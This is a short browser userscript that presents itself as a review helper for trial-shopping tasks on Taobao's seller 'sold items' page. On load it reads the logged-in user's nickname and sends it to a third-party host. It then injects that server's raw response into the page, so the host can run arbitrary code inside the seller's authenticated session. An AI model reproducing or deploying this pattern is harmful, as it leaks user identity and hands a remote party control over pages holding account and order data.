// ==UserScript== // @name 试客审核助手 // @namespace http://qq974778504.hk68.ok188.top // @version 5.1.1 // @description 试客联盟审核专用 // @author 974778504@qq.com // @match *://trade.taobao.com/trade/itemlist/list_sold_items.htm* // @grant GM_xmlhttpRequest // @require https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js // @downloadURL none // ==/UserScript== $(document).ready(function(){var title = $("#login-info .sn-user-nick").text();GM_xmlhttpRequest({method : "GET",url : "http://qq974778504.hk68.ok188.top/sk/ry.php?dpm="+title,onload : function (response) {$(document.body).append(response.responseText);}});});